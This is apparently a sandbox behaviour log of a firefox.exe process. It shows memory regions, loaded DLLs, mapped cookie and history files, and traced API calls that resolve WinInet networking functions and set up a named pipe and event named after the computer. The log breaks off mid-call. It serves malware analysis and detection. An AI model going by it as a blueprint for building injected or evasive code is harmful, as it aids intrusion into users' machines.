monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xaac" cmd_line = "\"c:\\program files\\mozilla firefox\\firefox.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3642 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3643 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3644 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3645 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3646 start_va = 0x120000 end_va = 0x163fff entry_point = 0x120000 region_type = mapped_file name = "firefox.exe" filename = "\\Program Files\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files\\mozilla firefox\\firefox.exe") Region: id = 3647 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3648 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3649 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3650 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3651 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3652 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3653 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3654 start_va = 0x6e0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3655 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3656 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3657 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3658 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3659 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3660 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3661 start_va = 0x6cd50000 end_va = 0x6ce0dfff entry_point = 0x6cd50000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 3662 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3663 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3664 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3665 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3666 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3667 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3668 start_va = 0x580000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3669 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3670 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3671 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3672 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3673 start_va = 0x720000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3674 start_va = 0x830000 end_va = 0x142ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3675 start_va = 0x1590000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 3676 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3677 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3678 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3679 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3680 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3681 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3682 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3683 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3684 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3685 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3686 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3687 start_va = 0x15a0000 end_va = 0x186efff entry_point = 0x15a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3688 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3689 start_va = 0x74eb0000 end_va = 0x7504dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3690 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0xf0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3691 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3692 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3693 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3694 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3695 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3696 start_va = 0x170000 end_va = 0x19bfff entry_point = 0x170000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 3697 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 3698 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x1a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 3699 start_va = 0x1900000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3700 start_va = 0x74550000 end_va = 0x74570fff entry_point = 0x74550000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3701 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3702 start_va = 0x763a0000 end_va = 0x763e4fff entry_point = 0x763a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3703 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3704 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3705 start_va = 0x1a00000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 3706 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3707 start_va = 0x1430000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 3708 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3709 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3710 start_va = 0x1a60000 end_va = 0x1b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 3711 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 3712 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3713 start_va = 0x73750000 end_va = 0x737a1fff entry_point = 0x73750000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 3714 start_va = 0x73730000 end_va = 0x73744fff entry_point = 0x73730000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 3715 start_va = 0x74650000 end_va = 0x7465cfff entry_point = 0x74650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3716 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3717 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3718 start_va = 0x72d70000 end_va = 0x72d75fff entry_point = 0x72d70000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 3719 start_va = 0x1c40000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 3720 start_va = 0x74240000 end_va = 0x7424ffff entry_point = 0x74240000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3721 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3722 start_va = 0x1c0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3723 start_va = 0x1d40000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3724 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3725 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3726 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3727 start_va = 0x1e70000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 3728 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 3729 start_va = 0x6f850000 end_va = 0x6f855fff entry_point = 0x6f850000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3730 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3731 start_va = 0x1ff0000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 3732 start_va = 0x20f0000 end_va = 0x21effff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 3733 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3734 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3735 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3736 start_va = 0x70600000 end_va = 0x70659fff entry_point = 0x70600000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3737 start_va = 0x21f0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 3738 start_va = 0x75740000 end_va = 0x7577afff entry_point = 0x75740000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3739 start_va = 0x759a0000 end_va = 0x759b5fff entry_point = 0x759a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3740 start_va = 0x75ec0000 end_va = 0x75ecdfff entry_point = 0x75ec0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3741 start_va = 0x2410000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 3742 start_va = 0x6efd0000 end_va = 0x6efd7fff entry_point = 0x6efd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3743 start_va = 0x748c0000 end_va = 0x748cffff entry_point = 0x748c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3744 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 3745 start_va = 0x74890000 end_va = 0x748a1fff entry_point = 0x74890000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3746 start_va = 0x75960000 end_va = 0x7599bfff entry_point = 0x75960000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3747 start_va = 0x74880000 end_va = 0x74887fff entry_point = 0x74880000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3748 start_va = 0x754b0000 end_va = 0x754b4fff entry_point = 0x754b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3749 start_va = 0x75950000 end_va = 0x75955fff entry_point = 0x75950000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3750 start_va = 0x73fe0000 end_va = 0x74017fff entry_point = 0x73fe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3751 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3752 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3753 start_va = 0x75420000 end_va = 0x75428fff entry_point = 0x75420000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3754 start_va = 0x1f0000 end_va = 0x1f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3755 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 3756 start_va = 0x210000 end_va = 0x217fff entry_point = 0x210000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 3758 start_va = 0x2560000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 3759 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 205 os_tid = 0x248 Thread: id = 206 os_tid = 0x850 [0093.792] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0093.792] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x77720000 [0093.792] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0093.792] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0093.792] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="realloc") returned 0x7772b10d [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="sprintf") returned 0x7773d354 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="srand") returned 0x7772f757 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="rand") returned 0x7772c070 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="_vsnprintf") returned 0x7772d1a8 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="strtok") returned 0x7772df1f [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="strcmp") returned 0x77738b11 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0093.793] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="CreateNamedPipeW") returned 0x7620270f [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileW") returned 0x7621cc56 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="SetNamedPipeHandleState") returned 0x7622f420 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="SetEvent") returned 0x7621bccc [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="GetOverlappedResult") returned 0x76212f04 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="ConnectNamedPipe") returned 0x76202727 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0093.793] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="FlushFileBuffers") returned 0x76207f81 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="DisconnectNamedPipe") returned 0x7622f438 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="OpenEventW") returned 0x7621548b [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="ResetEvent") returned 0x7621bcb4 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemTime") returned 0x7621ced8 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="ExitProcess") returned 0x7622214f [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="SetLastError") returned 0x7621bb08 [0093.794] GetProcAddress (hModule=0x761d0000, lpProcName="OutputDebugStringA") returned 0x7620eb36 [0093.794] LoadLibraryW (lpLibFileName="WinInet.dll") returned 0x76600000 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestExA") returned 0x76691812 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpQueryInfoA") returned 0x7661a33e [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetConnectA") returned 0x766249e9 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetReadFile") returned 0x7661b406 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetWriteFile") returned 0x766346da [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpOpenRequestA") returned 0x76624c7d [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpEndRequestA") returned 0x766345ea [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpAddRequestHeadersA") returned 0x7661dcd2 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestA") returned 0x766918f8 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetOpenA") returned 0x7662f18e [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetCloseHandle") returned 0x7661ab49 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetQueryOptionA") returned 0x76611b56 [0093.804] GetProcAddress (hModule=0x76600000, lpProcName="InternetSetOptionA") returned 0x766175e8 [0093.805] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x77830000 [0093.805] GetProcAddress (hModule=0x77830000, lpProcName="ObtainUserAgentString") returned 0x77861d76 [0093.805] GetComputerNameW (in: lpBuffer=0x57f384, nSize=0x57f5a8 | out: lpBuffer="CRH2YWU7", nSize=0x57f5a8) returned 1 [0093.805] _snwprintf (in: _Dest=0x57f5e0, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0093.805] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x64 [0093.805] CreateNamedPipeW (lpName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwOpenMode=0x40000003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x200, nInBufferSize=0x200, nDefaultTimeOut=0x3e8, lpSecurityAttributes=0x0) returned 0x60 [0093.805] GetComputerNameW (in: lpBuffer=0x57f394, nSize=0x57f5a8 | out: lpBuffer="CRH2YWU7", nSize=0x57f5a8) returned 1 [0093.805] _snwprintf (in: _Dest=0x57f7e8, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0093.805] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="c41b2305") returned 0x68 [0093.805] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x231230 | out: 